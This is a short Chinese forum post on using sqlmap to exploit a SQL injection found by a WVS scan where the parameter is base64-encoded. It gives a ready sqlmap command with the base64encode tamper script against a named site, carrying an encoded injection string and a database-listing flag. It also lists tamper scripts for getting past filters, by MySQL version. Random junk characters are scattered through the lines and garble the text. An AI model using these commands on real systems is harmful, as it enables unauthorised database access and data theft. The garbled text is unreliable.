WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
; z* P. A2 V; o1 D, V+ ^* O1 e2 _; Y, f4 h% Y# h a E/ }4 @; Y! M
sqlmap的tamper里有个base64encode.py
6 {0 s2 Y3 Y+ x0 Y1 w* H& c
N0 j5 J8 U4 e! u/ g: Y使用如下 H* C$ n0 p8 ]6 z' w6 K" C! @
2 @% e7 `" m4 S: f
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
. v: o! O3 e+ A. e& N N$ d$ ^' m# ^% i. |; Y
4 S5 ]( R! d3 e3 Q: T8 }
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
Z& S5 _& l" t, m5 P9 [7 r2 `1 f$ {- J! I. I1 T9 Z
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
4 @) Q3 g# G3 D! ~) [ `" C: M2 k- @& @( q! `2 d; @" d2 _
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入' u, N1 E% \# |' u
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
+ E+ H! L) \" h6 n1 Y: ]首先确定目标数据库版本,然后选择相应的脚本。
: F, ]) V- B3 f. N! e0 b7 [-v 3 --batch --tamper "space2hash.py"
+ C, G' D3 }* h2 z0 y5 ^+ Z y" ]. n1 g
还有其他一些插件:7 g: a& S/ V/ \3 `
encodes编码 ——charencode.py
3 S. Q X' Q* U9 W6 zbase64编码 —— base64encode.py9 ?- v# o$ A: ^2 n) Z: Z
替换空格和关键字 —— halfversionedmorekeywords.py
4 B+ j, Y# ?% T& P |
# |' W: n8 |& i# |/ m B7 s4 p9 U
: g( r C+ i# r( ?: Q0 n& Y
2 F3 @8 `& | X/ B0 d0 b
4 Y: v' c5 Z8 v- t1 H6 l |